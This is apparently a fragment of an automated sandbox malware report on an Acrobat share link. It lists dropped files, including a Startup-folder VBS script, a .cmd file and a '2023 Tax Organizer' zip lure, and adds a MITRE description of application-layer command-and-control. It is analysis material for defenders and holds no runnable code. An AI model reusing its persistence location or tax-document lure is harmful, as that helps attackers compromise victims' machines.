C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FDNUA.vbs

C:\Users\user\AppData\Roaming\WindowsServices\VJQSJ.cmd

C:\Users\user\Downloads\2023 Tax Organizer.zip (copy)

C:\Users\user\Downloads\2023 Tax Organizer.zip.crdownload (copy)

C:\Users\user\Downloads\853e3259-3419-4519-8671-df216c72cbf5.tmp

Chrome Cache Entry: 180

Chrome Cache Entry: 181

Chrome Cache Entry: 182

Chrome Cache Entry: 183

Chrome Cache Entry: 184

Chrome Cache Entry: 185

Chrome Cache Entry: 186

Chrome Cache Entry: 187

Chrome Cache Entry: 188

Chrome Cache Entry: 189

Chrome Cache Entry: 190

Chrome Cache Entry: 191

Chrome Cache Entry: 193

Windows Analysis Report
https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre